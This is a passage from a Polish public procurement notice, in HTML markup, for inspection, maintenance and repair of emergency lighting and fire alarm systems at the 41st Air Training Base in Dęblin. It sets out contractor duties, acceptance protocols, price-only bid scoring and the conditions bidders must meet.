elektryczne, kleje, smary, bezpieczniki, sprężone powietrze, materiały do czyszczenia urządzeń, diody, żarówki, przekaźniki, szybki w przyciskach ręcznych, rolki papieru do urządzeń drukujących w centralach, uszczelki oraz narzędzia niezbędne do prawidłowego wykonania usługi.<br/><br/>Wykonawca zobowiązuje się wykonywać usługę w godzinach 700-1500 w dniach od poniedziałku do piątku. Wykonawca zobowiązuje się do poinformowania e-mail osobę odpowiedzialna za realizacje umowy, o terminie rozpoczęcia przedmiotowych usług z 3 -dniowym wyprzedzeniem.<br/><br/>Pracownicy wykonujący usługę powinni być przeszkoleni w serwisowaniu instalacji systemu oświetlenia ewakuacyjnego. <br/><br/>Odbiór usługi: <br/>Wykonawca powinien po zakończeniu prac uzyskać potwierdzenie ich wykonania od Zamawiającego na podstawie protokołu odbioru usługi oddzielnie dla każdego obiektu.<br/>Po każdym przeglądzie konserwacyjnym Wykonawca sporządzi protokół stanu technicznego konserwowanego urządzenia oddzielnie na każdy obiekt budowlany, urządzenie podpisany przez przedstawiciela Wykonawcy i Zamawiającego.<br/>Zakres, prawidłowość i jakość wykonanej usługi przeglądów technicznych, czynności konserwacyjnych, napraw instalacji systemu oświetlenia ewakuacyjnego potwierdza Szef Infrastruktury 41 Bazy Lotnictwa Szkolnego w Dęblinie lub osoba przez niego upoważniona. Potwierdzenie wykonania usługi następuje w formie protokołu odbioru, podpisywanego przez strony umowy w 3 egzemplarzach. Po każdym przeglądzie będzie wystawiona faktura VAT. Jeden egzemplarz protokołu ma być każdorazowo podłączony do faktury VAT po każdym przeglądzie.<br/><br/>Wykonawca zobowiązany jest po wykonaniu każdorazowej usługi przeglądów technicznych, czynności konserwacyjnych, napraw instalacji oświetlenia ewakuacyjnego do podpisania protokołu odbioru usługi. Po każdym przeglądzie będzie wystawiona faktura VAT, zawierająca wymienione koszty wykonanej usługi, w oparciu o ceny określone w formularzu cenowym, stanowiącego załącznik nr 1 do umowy.<br/><br/>Zamawiający może odmówić odbioru usługi, jeżeli stwierdzi, że Wykonawca nie zakończył prac lub wykonał je nieprawidłowo. Wady stwierdzone przy odbiorze usługi muszą być usunięte przez Wykonawcę na jego koszt w terminie wyznaczonym przez Zamawiającego, nie dłuższym jednak niż 7 dni (siedem dni). </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">50710000-5 - Usługi w zakresie napraw i konserwacji elektrycznych i mechanicznych instalacji budynkowych</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">105 dni</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Oferty będą oceniane w odniesieniu do najkorzystniejszych warunków przedstawionych przez Wykonawców w zakresie kryterium według następującego wzoru:<br/>Lp.	KRYTERIUMX1 Cena brutto oferty\(całkowite wynagrodzenie ryczałtowe brutto obejmujące usługi realizowane w ramach przeglądów technicznych, czynności konserwacyjnych, napraw)<br/>WAGA100% <br/>Maksymalna liczba punktów do uzyskania w danym kryterium100 punktów<br/>Opis sposobu oceny ofert:<br/>1.	Przez cenę oferty brutto Zamawiający rozumie:<br/>- całkowite wynagrodzenie ryczałtowe brutto Wykonawcy przypadające za wykonanie przeglądów technicznych, czynności konserwacyjnych, napraw instalacji systemu oświetlenia ewakuacyjnego, znajdujących się w kompleksach: Dęblin - Lotnisko, Dęblin Twierdza, WCR, Bezwola, Klikawa [Suma wierszy: Wartość jednorazowej konserwacji instalacji oświetlenia ewakuacyjnego ogółem za ROK 2025r. (Tabela nr 1a Formularza ofertowego poz. 1-55, kol. 8) oraz Wartość naprawy/wymiany oświetlenia ewakuacyjnego ogółem za ROK 2025 (Tabela Nr 1b Formularza ofertowego poz. 1-23, kol. 8)].<br/><br/>2.	Ilość punktów uzyskanych w kryterium „cena brutto oferty” będzie wyliczona według następującego wzoru: <br/>X1 = (Cn : Cb) x 100 x 100% (ilość punktów)<br/><br/>X1 – ilość punktów uzyskanych w kryterium ,,cena brutto oferty”<br/>Cn – najniższa cena brutto (najniższe całkowite wynagrodzenie ryczałtowe brutto, przypadające za świadczenie usługi w zakresie przedmiotu zamówienia: przeglądów technicznych, czynności konserwacyjnych, napraw instalacji systemu oświetlenia ewakuacyjnego). <br/>Cb– cena brutto oferty ocenianej (całkowite wynagrodzenie ryczałtowe brutto przypadające za świadczenie usługi w zakresie przedmiotu zamówienia: przeglądów technicznych, czynności konserwacyjnych, napraw instalacji systemu oświetlenia ewakuacyjnego). <br/>Pod pojęciem „ceny” należy rozumieć cenę w rozumieniu art. 3 ust. 1 pkt. 1 i ust. 2 ustawy z dnia 9 maja 2014 r. o informowaniu o cenach towarów i usług. <br/><br/>Za najkorzystniejszą cenę brutto zamawiający uznaje cenę najniższą (najniższe całkowite wynagrodzenie ryczałtowe brutto, przypadające za świadczenie usługi w zakresie przedmiotu zamówienia: przeglądów technicznych, czynności konserwacyjnych, napraw instalacji systemu oświetlenia ewakuacyjnego. <br/>Maksymalna liczba punktów wynosi 100 punktów<br/>3.	Oferty będą oceniane w odniesieniu do najkorzystniejszych warunków przedstawionych przez wykonawców w zakresie wskazanych powyżej kryteriów. <br/>4.	Zamawiający zastosuje zaokrąglanie wyników do dwóch miejsc po przecinku, zgodnie z matematycznymi zasadami zaokrąglania.<br/><br/>5.	Oferty będą oceniane w odniesieniu do najkorzystniejszych warunków przedstawionych przez wykonawców w zakresie wskazanych powyżej kryteriów. <br/><br/>6.	Zamawiający zastosuje zaokrąglanie wyników do dwóch miejsc po przecinku, zgodnie z matematycznymi zasadami zaokrąglania.<br/><br/>7.	Wykonawca powinien wkalkulować w cenę oferty ryzyko wynikające z przyjęcia ryczałtowego charakteru wynagrodzenia, tj. Wykonawca nie może żądać podwyższenia wynagrodzenia, chociażby w czasie zawarcia umowy nie można było przewidzieć rozmiaru lub kosztu prac. Wykonawca w przedstawionej ofercie powinien zaoferować cenę kompletną, jednoznaczną i ostateczną.<br/><br/>8.	Według zamawiającego za najkorzystniejszą ofertę uznana zostanie oferta, która spełni wszystkie wymagania określone w opisie przedmiotu zamówienia oraz otrzyma najwyższą ilość punktów obliczonych zgodnie z powyższymi wzorami (przedstawi najkorzystniejszy bilans wskazanych wyżej kryteriów).</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Procentowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Wyłącznie kryterium ceny </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">100</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 2</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> 1. Przedmiotem zamówienia jest wykonanie usługi obejmującej swym zakresem wykonanie przeglądów technicznych, czynności konserwacyjnych oraz napraw oświetlenia ewakuacyjnego oraz wykonanie przeglądów technicznych i czynności konserwacyjnych Systemu Sygnalizacji Pożaru w budynkach administrowanych przez 41. Bazę Lotnictwa Szkolnego w Dęblinie.<br/><br/>2. Postępowanie zostało podzielone na 2 (dwa) niezależne części (zadania): <br/>b/ część 2 – Zadanie nr II: Wykonanie przeglądów technicznych i czynności konserwacyjnych instalacji Systemu Sygnalizacji Pożaru w budynku nr 12, nr 14 oraz instalacji systemu oświetlenia ewakuacyjnego w budynku nr 12 znajdujących się na terenie kompleksu Dęblin-Lotnisko.<br/>Wszędzie tam, gdzie przedmiot zamówienia jest opisany poprzez wskazanie: znaków towarowych, patentów lub pochodzenia, źródła lub szczególnego procesu, który charakteryzuje produkty dostarczane przez konkretnego Wykonawcę, jeżeli miałoby to doprowadzić do uprzywilejowania lub wyeliminowania niektórych wykonawców lub produktów – Zamawiający dopuszcza zastosowanie przez wykonawcę materiałów równoważnych w stosunku do opisanych w opisie przedmiotu zamówienia (podstawa prawna art. 99 ust. 5 ustawy Pzp), pod warunkiem, że będą one posiadały, co najmniej takie same lub lepsze parametry techniczne i funkcjonalne i nie obniżą określonych w SWZ standardów. Nie dopuszcza się odstępstw od minimalnych parametrów oraz funkcji i przeznaczenia. Należy przyjąć, że wskazane znaki towarowe określają minimalne parametry techniczne, eksploatacyjne, użytkowe wymagane przez Zamawiającego (mają charakter przykładowy). Ich wskazanie w opisie przedmiotu zamówienia ma na celu doprecyzowanie oczekiwań Zamawiającego w stosunku do przedmiotu zamówienia i stanowi wzorzec przedmiotu zamówienia.ZADANIE II:<br/><br/>- Zobowiązania Wykonawcy<br/>Wykonawca zobowiązany jest do wykonania przedmiotu zamówienia siłami własnymi i z własnych materiałów, zgodnie z posiadaną wiedzą techniczną, w sposób zgodny z technologią obsługi i konserwacji instalacji systemu sygnalizacji pożaru, obsługi i konserwacji instalacji systemu oświetlenia ewakuacyjnego oraz przy użyciu materiałów dopuszczonych do obrotu, lub przedstawi do zatwierdzenia przez Zamawiającego umowę z podwykonawcą.<br/><br/>Wykonawca jako wytwórca odpadów zobowiązany jest do przestrzegania przepisów ustawy o odpadach z dnia 14.12.2012 r., będzie unikał szkodliwych działań w zakresie nadmiernego hałasu i innych szkodliwych dla środowiska i otoczenia czynników powodowanych działalnością przy wykonywaniu usług.<br/><br/>Wykonawca zobowiązany jest do realizacji usługi w sposób uniemożliwiający powstanie jakichkolwiek uszkodzeń w mieniu Zamawiającego, użytkowników kompleksów wojskowych objętych usługą lub osób trzecich. W przypadku wyrządzenia jakiejkolwiek szkody, Wykonawca zobowiązuje się do jej naprawienia bądź usunięcia na własny koszt, a gdy będzie to niemożliwe, poniesie on koszty odszkodowania lub zadośćuczynienia.<br/><br/>- Sprzęt i narzędzia:<br/><br/>Wykonawca zapewnia całość robocizny, sprzętu, materiałów, narzędzi i transportu niezbędnych do wykonania usługi stanowiącej przedmiot umowy. Koszty wliczone do ceny usługi.<br/><br/>Narzędzia, materiały i sprzęt używany podczas realizacji usługi winny posiadać stosowne atesty lub certyfikaty, dopuszczające je do powszechnego użytku oraz do stosowania podczas wykonywania prac, oraz winny spełniać wszystkie wymagania określone w ustawie z dnia 7 lipca 1994 roku Prawo budowlane oraz ustawie z dnia 16 kwietnia 2004 roku o wyrobach budowlanych.<br/><br/>Prowadzone w ramach przedmiotowej usługi prace muszą być wykonywane w sposób zgodny z przepisami ustawy z dnia 27 kwietnia 2001 roku Prawo ochrony środowiska. W szczególności Wykonawca winien unikać szkodliwych działań w zakresie nadmiernego hałasu i innych szkodliwych dla środowiska i otoczenia czynników, powodowanych wykonywanymi pracami. Ponadto Wykonawca jako wytwórca odpadów zobowiązany jest do przestrzegania przepisów ustawy z dnia 14 grudnia 2012 roku o odpadach.<br/><br/>Podczas realizacji usługi przeglądu technicznego, czynności konserwacyjnych instalacji systemu sygnalizacji pożaru oraz instalacji systemu oświetlenia ewakuacyjnego Wykonawca zabezpiecza we własnym zakresie bez dodatkowego wynagrodzenia podstawowe materiały konserwacyjne i drobne części, jak: krótkie przewody elektryczne, zaciski elektryczne, kleje, smary, bezpieczniki, sprężone powietrze, materiały do czyszczenia urządzeń, diody, żarówki, przekaźniki, szybki w przyciskach ręcznych, rolki papieru do urządzeń drukujących w centralach, uszczelki oraz narzędzia niezbędne do prawidłowego wykonania usługi.<br/><br/>Wykonawca zobowiązuje się wykonywać usługę w godzinach 700-1500 w dniach od poniedziałku do piątku. Wykonawca zobowiązuje się do poinformowania e-mail osobę odpowiedzialna za realizacje umowy, o terminie rozpoczęcia przedmiotowych usług z 3 -dniowym wyprzedzeniem.<br/><br/>- Osoby wykonujące przeglądy techniczne, czynności konserwacyjne i naprawy<br/><br/>Przeglądy techniczne, czynności konserwacyjne systemów powinny być wykonywane przez osoby posiadające wiedzę techniczną i doświadczenie w zakresie serwisowania urządzeń przeciwpożarowych wymienionych w § 1 pkt. 1 Projektowanych postanowieniach umowy takich jak: POLON, INIM.<br/><br/>Pracownicy wykonujący usługę powinni być przeszkoleni w serwisowaniu instalacji systemu sygnalizacji pożaru, instalacji systemu oświetlenia ewakuacyjnego. <br/><br/><br/>Odbiór usługi: <br/>Wykonawca powinien po zakończeniu prac uzyskać potwierdzenie ich wykonania od Zamawiającego na podstawie protokołu odbioru usługi oddzielnie dla każdego obiektu.<br/>Po każdym przeglądzie konserwacyjnym Wykonawca sporządzi protokół stanu technicznego konserwowanego urządzenia oddzielnie na każdy obiekt budowlany, urządzenie podpisany przez przedstawiciela Wykonawcy i Zamawiającego.<br/>Po każdym przeglądzie będzie wystawiona faktura VAT, zawierająca wymienione koszty wykonanej usługi, w oparciu o ceny określone w formularzu cenowym, stanowiącego załącznik nr 1 do umowy.<br/><br/>Zakres, prawidłowość i jakość wykonanej usługi przeglądów technicznych, czynności konserwacyjnych instalacji systemu sygnalizacji pożaru oraz instalacji systemu oświetlenia ewakuacyjnego potwierdza Szef Infrastruktury 41 Bazy Lotnictwa Szkolnego w Dęblinie lub osoba przez niego upoważniona. Potwierdzenie wykonania usługi następuje w formie protokołu odbioru, podpisywanego przez strony umowy w 3 egzemplarzach. Po każdym przeglądzie będzie wystawiona faktura VAT. Jeden egzemplarz protokołu ma być każdorazowo podłączony do faktury VAT po każdym przeglądzie.<br/><br/>Zamawiający może odmówić odbioru usługi, jeżeli stwierdzi, że Wykonawca nie zakończył prac lub wykonał je nieprawidłowo. Wady stwierdzone przy odbiorze usługi muszą być usunięte przez Wykonawcę na jego koszt w terminie wyznaczonym przez Zamawiającego, nie dłuższym jednak niż 7 dni (siedem dni).<br/><br/><br/>Główny przedmiot zamówienia wg Wspólnego Słownika Zamówień (CPV) <br/><br/>Numer kodu CPV*	Nazewnictwo zgodne z Wspólnym Słownikiem Zamówień Publicznych*<br/>50710000-5	Usługi w zakresie napraw i konserwacji elektrycznych i mechanicznych instalacji budynkowych<br/><br/>W ramach zamówienia Wykonawca zrealizuje usługę polegającą na wykonaniu przeglądów technicznych, czynności konserwacyjnych, Systemu Sygnalizacji Pożaru znajdujących się kompleksie wojskowym Dęblin Lotnisko administrowanym przez 41. BLSz, w budynku nr 12 i nr 14, Instalacji Systemu Oświetlenia Ewakuacyjnego w budynku nr 12 oraz sporządzi protokoły z przeglądów i konserwacji określające zakres wykonania czynności.<br/><br/>Szczegółowy opis przedmiotu zamówienia ZADANIE II określa niniejsza SWZ oraz <br/>a) Załącznik Nr 1 do SWZ Formularz Ofertowy (Załącznik Nr 1 do umowy);<br/>b) Załącznik Nr 1b do SWZ Szczegółowy opis przedmiotu zamówienia ZADANIE II (załącznik Nr 2 do umowy), <br/>c) Załącznik Nr 9b - Projektowane postanowienia umowy ZADANIE II.<br/>Wszystkie załączniki stanowią integralna część niniejszej SWZ.<br/><br/>3. Gwarancja – dotyczy wszystkich zadań<br/>Wykonawca udzieli Zamawiającemu gwarancji jakości na wykonaną usługę przeglądów, konserwacji, napraw na okres 12 miesięcy (dwunastu miesięcy), liczony od momentu podpisania protokołu odbioru usługi. Gwarancja udzielona Zamawiającemu przez Wykonawcę jest bezwarunkowa. Wykonawca nie może uzależnić jej udzielenia od spełnienia przez Zamawiającego jakichkolwiek dodatkowych warunków lub wymagań.<br/><br/>Szczegółowe informacje dotyczący gwarancji określają Projektowane postanowienia umowy Załącznik Nr 9a/9b do SWZ.<br/><br/>4. Podwykonawstwo - dotyczy wszystkich zadań<br/>Zamawiający nie wymaga osobistego wykonania przez Wykonawcę kluczowych części zamówienia. <br/><br/>W przypadku, gdy Wykonawca zamierza powierzyć wykonanie części zamówienia podwykonawcy (z wyłączeniem zastosowania art. 462 ust. 5 i 6 ustawy Pzp), jest zobowiązany wskazać w ofercie: <br/>1) części zamówienia, które zamierza powierzyć podwykonawcy; <br/>2) nazwy ewentualnych podwykonawców (jeżeli są już znani). </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">50710000-5 - Usługi w zakresie napraw i konserwacji elektrycznych i mechanicznych instalacji budynkowych</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">105 dni</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Oferty będą oceniane w odniesieniu do najkorzystniejszych warunków przedstawionych przez Wykonawców w zakresie kryterium według następującego wzoru:<br/><br/>Lp.	KRYTERIUM	X1	Cena brutto oferty,<br/>(całkowite wynagrodzenie ryczałtowe brutto obejmujące usługi realizowane w ramach przeglądów technicznych, czynności konserwacyjnych) <br/>WAGA100% <br/>Maksymalna liczba punktów do uzyskania w danym kryterium100 punktów<br/>	<br/>Opis sposobu oceny ofert <br/>1.	Przez cenę oferty brutto Zamawiający rozumie:<br/>- całkowite wynagrodzenie ryczałtowe brutto Wykonawcy przypadające za wykonanie przeglądów technicznych, czynności konserwacyjnych Systemu Sygnalizacji Pożaru znajdujących się w budynku nr 12 i nr 14, instalacji systemu oświetlenia ewakuacyjnego w budynku nr 12 znajdujących się w kompleksie Dęblin – Lotnisko [Suma wierszy: Wartość konserwacji systemu sygnalizacji pożaru kompleks Dęblin - Lotnisko za ROK 2025 (Tabela 2a Formularza ofertowego, poz. 1-4, kol. 8) i Wartość konserwacji systemu oświetlenia ewakuacyjnego za ROK 2025 (Tabela 2b Formularza ofertowego poz. 1, kol. 8)]<br/><br/>Ilość punktów uzyskanych w kryterium „cena brutto oferty” będzie wyliczona według następującego wzoru: <br/>X1 = (Cn : Cb) x 100 x 100% (ilość punktów)<br/>X1 – ilość punktów uzyskanych w kryterium ,,cena brutto oferty”<br/>Cn– najniższa cena brutto (najniższe całkowite wynagrodzenie ryczałtowe brutto, przypadające za świadczenie usługi w zakresie przedmiotu zamówienia: przeglądów technicznych, czynności konserwacyjnych, instalacji SSP, instalacji systemu oświetlenia ewakuacyjnego), <br/>Cb– cena brutto oferty ocenianej (całkowite wynagrodzenie ryczałtowe brutto przypadające za świadczenie usługi w zakresie przedmiotu zamówienia: przeglądów technicznych, czynności konserwacyjnych instalacji SSP, instalacji systemu oświetlenia ewakuacyjnego). <br/>2.	Pod pojęciem „ceny” należy rozumieć cenę w rozumieniu art. 3 ust. 1 pkt. 1 i ust. 2 ustawy z dnia 9 maja 2014 r. o informowaniu o cenach towarów i usług. <br/><br/>3.	Za najkorzystniejszą cenę brutto zamawiający uznaje cenę najniższą (najniższe całkowite wynagrodzenie ryczałtowe brutto, przypadające za świadczenie usługi w zakresie przedmiotu zamówienia: przeglądów technicznych, czynności konserwacyjnych instalacji SSP, instalacji systemu oświetlenia ewakuacyjnego. <br/><br/>4.	Maksymalna liczba punktów wynosi 100 punktów<br/><br/>5.	Oferty będą oceniane w odniesieniu do najkorzystniejszych warunków przedstawionych przez wykonawców w zakresie wskazanych powyżej kryteriów. <br/><br/>6.	Zamawiający zastosuje zaokrąglanie wyników do dwóch miejsc po przecinku, zgodnie z matematycznymi zasadami zaokrąglania.<br/><br/>7.	Zamawiający zastosuje zaokrąglanie wyników do dwóch miejsc po przecinku, zgodnie z matematycznymi zasadami zaokrąglania.<br/><br/>8.	Wykonawca powinien wkalkulować w cenę oferty ryzyko wynikające z przyjęcia ryczałtowego charakteru wynagrodzenia, tj. Wykonawca nie może żądać podwyższenia wynagrodzenia, chociażby w czasie zawarcia umowy nie można było przewidzieć rozmiaru lub kosztu prac. Wykonawca w przedstawionej ofercie powinien zaoferować cenę kompletną, jednoznaczną i ostateczną.<br/><br/>9.	Według zamawiającego za najkorzystniejszą ofertę uznana zostanie oferta, która spełni wszystkie wymagania określone w opisie przedmiotu zamówienia oraz otrzyma najwyższą ilość punktów obliczonych zgodnie z powyższymi wzorami (przedstawi najkorzystniejszy bilans wskazanych wyżej kryteriów).</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Procentowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Wyłącznie kryterium ceny </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">100</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.2.) Fakultatywne podstawy wykluczenia: </h3> <p class="mb-0">Art. 109 ust. 1 pkt 1</p> <p class="mb-0">Art. 109 ust. 1 pkt 4</p> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> O udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy spełniają warunki na podstawie art. 112-117 ustawy Pzp dotyczące:<br/><br/>I.	ZDOLNOŚCI DO WYSTĘPOWANIA W OBROCIE GOSPODARCZYM /art. 112 ust. 2 pkt 1) ustawy Pzp/:<br/><br/>Dotyczy wszystkich zadań:<br/>Zamawiający nie stawia szczególnych wymagań w zakresie spełniania tego warunku.<br/><br/>II.	UPRAWNIEŃ DO PROWADZENIA OKREŚLONEJ DZIAŁALNOŚCI GOSPODARCZEJ LUB ZAWODOWEJ, O ILE WYNIKA TO Z ODRĘBNYCH PRZEPISÓW /art. 112 ust. 2 pkt. 2) ustawy Pzp/:<br/><br/>ZADANIE I:<br/>Zamawiający nie stawia szczególnych wymagań w zakresie spełniania tego warunku.<br/><br/>ZADANIE II:<br/>Warunek zostanie spełniony, jeśli Wykonawca wykaże, że :<br/>- Wykonawca wykonujący usługę przeglądów technicznych, czynności konserwacyjnych instalacji systemu sygnalizacji pożaru musi posiadać aktualne zezwolenie wydane przez Państwową Agencję Atomistyki w zakresie obsługi urządzeń zawierających źródła promieniotwórcze.<br/><br/>Wspólne ubieganie się o udzielenie zamówienia<br/>Zgodnie z art. 117 ust. 2 ustawy Prawo zamówień publicznych warunek dotyczący uprawnień do prowadzenia określonej działalności gospodarczej lub zawodowej, o którym mowa w art. 112 ust. 2 pkt. 2, jest spełniony, jeżeli co najmniej jeden z wykonawców wspólnie ubiegających się o udzielenie zamówienia posiada uprawnienia do prowadzenia określonej działalności gospodarczej lub zawodowej i zrealizuje usługę, do których realizacji te uprawnienia są wymagane.<br/><br/>III.	SYTUACJI EKONOMICZNEJ LUB FINANSOWEJ/art. 112 ust. 2 pkt. 3) ustawy Pzp/:<br/><br/>Dotyczy wszystkich zadań: <br/>Zamawiający nie stawia szczególnych wymagań w zakresie spełniania tego warunku.<br/><br/>IV.	ZDOLNOŚCI TECHNICZNEJ LUB ZAWODOWEJ/art. 112 ust. 2 pkt. 4) ustawy Pzp/:<br/><br/>1)	ZADANIE I:<br/>a) Warunek zdolności technicznej zostanie spełniony, jeśli wykonawca wykaże i przedstawi, że dysponuje odpowiednim potencjałem technicznym oraz osobami zdolnymi do wykonania zamówienia publicznego tj.: <br/>•	Dysponuje dwoma pracownikami technicznymi (minimum 2 osoby), będącymi osobami realizującymi przedmiotowe zamówienie, posiadającymi uprawnienia:<br/> - ważne Świadectwo kwalifikacyjne Urzędu Regulacji Energetyki kategorii „D” i „E” w grupie 1 zgodnie z art. 54 Ustawy z dnia 10 kwietnia 1997r. – Prawo Energetyczne <br/><br/>2) ZADANIE II:<br/>a) Warunek zdolności technicznej zostanie spełniony, jeśli wykonawca wykaże i przedstawi, że dysponuje odpowiednim potencjałem technicznym oraz osobami zdolnymi do wykonania zamówienia publicznego tj.: <br/>•	Dysponuje dwoma pracownikami technicznymi (minimum 2 osoby), będącymi osobami realizującymi przedmiotowe zamówienie, posiadającymi uprawnienia:<br/> - ważne Świadectwo kwalifikacyjne Urzędu Regulacji Energetyki kategorii „D” i „E” w grupie 1 zgodnie z art. 54 Ustawy z dnia 10 kwietnia 1997r. – Prawo Energetyczne <br/>3. WYKONAWCY WSPÓLNIE UBIEGAJĄCY SIĘ O UDZIELENIE ZAMÓWIENIA PUBLICZNEGO (dotyczy wszystkich zadań): <br/><br/>3.1. warunek zdolności technicznej lub zawodowej powinien spełniać co najmniej jeden z wykonawców wspólnie ubiegających się o udzielenie zamówienia albo wszyscy ci wykonawcy wspólnie;<br/>3.2. w przypadku opisanym powyżej w pkt. 3.1 wykonawcy wspólnie ubiegający się o udzielenie zamówienia dołączają do oferty oświadczenie, z którego wynika, które usługi wykonają poszczególni wykonawcy.<br/><br/>4. SPEŁNIANIE WARUNKÓW POPRZEZ POLEGANIE NA POTENCJALE „INNYCH PODMIOTÓW” (dotyczy wszystkich zadań)<br/><br/>4.1. Zgodnie z art. 118 ust. 1 ustawy Pzp Wykonawca może w celu potwierdzenia spełniania warunków udziału w postępowaniu lub kryteriów selekcji, w stosownych sytuacjach oraz w odniesieniu do konkretnego zamówienia, lub jego części, polegać na zdolnościach technicznych lub zawodowych lub sytuacji finansowej lub ekonomicznej podmiotów udostępniających zasoby, niezależnie od charakteru prawnego łączących go z nimi stosunków prawnych.<br/> <br/>W odniesieniu do warunków uprawnień oraz doświadczenia zawodowego wykonawcy mogą polegać na zdolnościach podmiotów udostepniających zasoby, jeśli podmioty te wykonają (zrealizują) usługi, do realizacji których zdolności są wymagana.<br/><br/>4.2. Wykonawca, który polega na zdolnościach lub sytuacji podmiotów udostępniających zasoby, składa wraz z ofertą, zobowiązanie podmiotu udostępniającego zasoby do oddania mu do dyspozycji niezbędnych zasobów na potrzeby realizacji danego zamówienia lub inny podmiotowy środek dowodowy potwierdzający, że wykonawca realizując zamówienie, będzie dysponował niezbędnymi zasobami tych podmiotów.<br/><br/>4.3. Zobowiązanie podmiotu udostępniającego zasoby, o którym mowa wyżej potwierdza, że stosunek łączący wykonawcę z podmiotami udostępniającymi zasoby gwarantuje rzeczywisty dostęp do tych zasobów oraz określa w szczególności:<br/> 4.3.1. zakres dostępnych wykonawcy zasobów podmiotu udostępniającego zasoby;<br/>4.3.2. sposób i okres udostępnienia wykonawcy i wykorzystania przez niego zasobów podmiotu udostępniającego te zasoby przy wykonywaniu zamówienia;<br/>4.3.3. czy i w jakim zakresie podmiot udostepniający zasoby, na zdolnościach którego wykonawca polega w odniesieniu do warunków udziału w postępowaniu dotyczących wykształcenia, kwalifikacji zawodowych lub doświadczenia, zrealizuje usługi, których wskazane zdolności dotyczą<br/><br/>4.4. Zgodnie z art. 119 ustawy Pzp Zamawiający ocenia:<br/>1/ czy udostępniane wykonawcy przez podmioty udostępniające zasoby zdolności techniczne lub zawodowe lub ich sytuacja finansowa lub ekonomiczna, pozwalają na wykazanie przez wykonawcę spełniania warunków udziału w postępowaniu, o których mowa w art. 112 ust. 2 pkt 3 i 4, a także bada, <br/>2/ czy nie zachodzą, wobec tego podmiotu podstawy wykluczenia, które zostały przewidziane względem wykonawcy (Rozdział 6 SWZ).<br/><br/>4.5. Zgodnie z art. 120 ustawy Pzp podmiot, który zobowiązał się do udostępnienia zasobów, odpowiada solidarnie z wykonawcą, który polega na jego sytuacji finansowej lub ekonomicznej, za szkodę poniesioną przez zamawiającego powstałą wskutek nieudostępnienia tych zasobów, chyba że za nieudostępnienie zasobów podmiot ten nie ponosi winy.<br/><br/>4.6. Jeśli zdolności zawodowe i techniczne, sytuacja ekonomiczne lub finansowa podmiotu udostępniającego zasoby nie potwierdzają spełnienia przez wykonawcę warunków udziału w postepowaniu lub zachodzą, wobec tego podmiotu podstawy wykluczenia, zamawiający żąda aby wykonawca w terminie określonym przez zamawiającego:<br/>•	zastąpił ten podmiot innym podmiotem lub podmiotami albo <br/>•	wykazał, że samodzielnie spełnia warunki udziału w postępowaniu.<br/><br/>4.7. Wykonawca nie może, po upływie terminu składania ofert, powoływać się na zdolności lub sytuację podmiotów udostępniających zasoby, jeżeli na etapie składania ofert nie polegał on w danym zakresie na zdolnościach lub sytuacji podmiotów udostępniających zasoby. <br/><br/>Wykonawca, który korzysta z potencjału podmiotu trzeciego, przedstawia, wraz z własnym oświadczeniem wstępnym, także oświadczenie podmiotu udostępniającego zasoby, potwierdzające brak podstaw wykluczenia tego podmiotu oraz odpowiednio spełnianie warunków udziału w postępowaniu, w zakresie, w jakim wykonawca powołuje się na jego zasoby. <br/><br/>Dotychczasowa zasada składania przez wykonawcę oświadczenia wstępnego w imieniu podmiotu trzeciego w postępowaniach krajowych ulega modyfikacji. <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 